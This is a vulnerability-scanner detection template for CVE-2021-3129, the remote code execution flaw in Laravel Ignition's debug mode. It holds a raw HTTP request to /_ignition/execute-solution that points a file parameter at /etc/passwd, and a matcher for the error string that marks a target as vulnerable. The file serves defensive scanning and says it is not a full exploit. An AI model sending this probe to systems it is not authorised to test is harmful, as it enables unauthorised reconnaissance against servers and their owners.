id: CVE-2021-3129

info:
  name: LARAVEL <= V8.4.2 DEBUG MODE - REMOTE CODE EXECUTION
  author: z3bd
  severity: critical
  description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
  reference: https://www.ambionics.io/blog/laravel-debug-rce
  tags: cve,cve2021,laravel,rce

# Note:- This is detection template, use the referenced article for detailed exploit.

requests:
  - raw:
      - |
        POST /_ignition/execute-solution HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: deflate
        Accept: application/json
        Connection: close
        Content-Length: 144
        Content-Type: application/json

        {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "test", "viewFile": "/etc/passwd"}}

    matchers:
      - type: word
        words:
          - "failed to open stream: Permission denied"